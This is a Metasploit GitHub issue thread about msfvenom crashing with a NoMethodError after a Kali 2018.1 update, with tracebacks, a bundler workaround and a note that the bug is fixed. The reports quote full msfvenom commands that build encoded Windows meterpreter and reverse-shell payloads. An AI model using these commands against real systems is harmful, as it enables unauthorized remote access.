Metasploit-framework: Updates since Kali 2018.1 have broken msfvenom shikata_ga_nai encoding

Created on 4 Apr 2018 · 6 Comments · Source: rapid7/metasploit-framework

Steps to reproduce

How'd you do it?

1. On a clean Kali 2018.1 install with no updates running "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.224 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > reverse_shell_tcp.exe" results in the following correct output:
```
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.224 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > reverse_shell_tcp.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai chosen with final size 414
Payload size: 414 bytes
Final size of exe file: 73802 bytes
```

2. However, on a clean Kali 2018.1 install that has had an "apt-get update && apt-get dist-upgrade" performed as of April 4 2018, running the same command "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.224 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > reverse_shell_tcp.exe" results in the following error:

```
root@kali:~/test2# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.224 LPORT=4444 -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > reverse_shell_tcp.exe
Traceback (most recent call last):
    25: from /usr/bin/msfvenom:339:in `<main>'
    24: from /usr/bin/msfvenom:55:in `framework'
    23: from /usr/bin/msfvenom:46:in `init_framework'
    22: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
    21: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
    20: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
    19: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
    18: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
    17: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
    16: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
    15: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
    14: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
    13: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
    12: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
    11: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
    10: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
     9: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
     8: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
     7: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
     6: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
     5: from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
     4: from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
     3: from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_http.rb:48:in `generate_jar'
     2: from /usr/share/metasploit-framework/lib/msf/core/payload/uuid/options.rb:46:in `generate_uri_uuid_mode'
     1: from /usr/share/metasploit-framework/lib/rex/payloads/meterpreter/uri_checksum.rb:70:in `generate_uri_uuid'
/usr/share/metasploit-framework/lib/msf/core/payload/uuid.rb:356:in `to_uri': undefined method `encode_base64url' for Rex::Text:Module (NoMethodError)
```

The version of metasploit-framework installed on a clean 2018.1 Kali install is "4.16.30-0kali3" and a dist-upgrade replaces it with "4.16.47-0kali1"

If this is a Kali packaging issue rather than a metasploit-framework issue, I apologize - I haven't manually installed the latest metasploit-framework to test further. I'd appreciate any help you can provide. I haven't used "apt autoremove" to remove any old packages, nor have I been prompted to. Is this a Ruby version issue?

Thanks.

All 6 comments

Just to verify, I have the same error when using the -b switch as well, since updating this morning.
metasploit-framework/kali-rolling,now 4.16.47-0kali1 amd64 [installed]

"/usr/share/metasploit-framework/lib/msf/core/payload/uuid.rb:356:in `to_uri': undefined method `encode_base64url' for Rex::Text:Module (NoMethodError)"

I can confirm.

```
⇒  msfvenom -p windows/shell_reverse_tcp LHOST=10.10.2.42 LPORT=9901 EXITFUNC=thread -b '\x00'
Traceback (most recent call last):
        25: from /usr/bin/msfvenom:339:in `<main>'
        24: from /usr/bin/msfvenom:55:in `framework'
        23: from /usr/bin/msfvenom:46:in `init_framework'
        22: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
        21: from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
        20: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
        19: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
        18: from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
        17: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
        16: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
        15: from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
        14: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `load_modules'
        13: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `each'
        12: from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:119:in `block in load_modules'
        11: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `load_modules'
        10: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:248:in `each'
         9: from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:251:in `block in load_modules'
         8: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `recalculate'
         7: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:78:in `each_pair'
         6: from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:91:in `block in recalculate'
         5: from /usr/share/metasploit-framework/lib/msf/core/payload.rb:204:in `size'
         4: from /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:38:in `generate'
         3: from /usr/share/metasploit-framework/modules/payloads/singles/android/meterpreter_reverse_https.rb:48:in `generate_jar'
         2: from /usr/share/metasploit-framework/lib/msf/core/payload/uuid/options.rb:46:in `generate_uri_uuid_mode'
         1: from /usr/share/metasploit-framework/lib/rex/payloads/meterpreter/uri_checksum.rb:70:in `generate_uri_uuid'
/usr/share/metasploit-framework/lib/msf/core/payload/uuid.rb:356:in `to_uri': undefined method `encode_base64url' for Rex::Text:Module (NoMethodError)
```

Without the -b switch:

```
⇒  msfvenom -p windows/shell_reverse_tcp LHOST=10.10.2.42 LPORT=9901 EXITFUNC=thread -f py -o test.py
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of py file: 1556 bytes
Saved as: test.py
```

Running bundle exec with this also solves the issue just as in #9800
Curious that Kali apparently has patched this, but you're not seeing the patch in your Kali install?

This also seems to be a working fix, though theoretically we shouldn't have to do it:

```
--- a/msfvenom
+++ b/msfvenom
@@ -5,6 +5,7 @@ class MsfVenomError < StandardError; end
class HelpError < StandardError; end
class UsageError < MsfVenomError; end

+require 'bundler/setup'
require 'optparse'
require 'timeout'
```
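
Review bot: The added `require 'bundler/setup'` at the top of msfvenom runs unconditionally and without `BUNDLE_GEMFILE` being set, so Bundler searches for a Gemfile starting from the caller's current working directory rather than from the framework directory. msfvenom is routinely invoked from arbitrary directories, where that lookup can fail or pick up an unrelated Gemfile. Consider setting `ENV['BUNDLE_GEMFILE']` to the framework's own Gemfile, resolved relative to the script, before this require, and add a one-line comment saying why the require is there, since nothing in the hunk explains it.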

@busterb The problem persists even after clearing the apt cache and running apt full-upgrade. Thanks for the workaround in the meantime.

Fixed with #9817, this will take a day or so to filter down to apt packages.
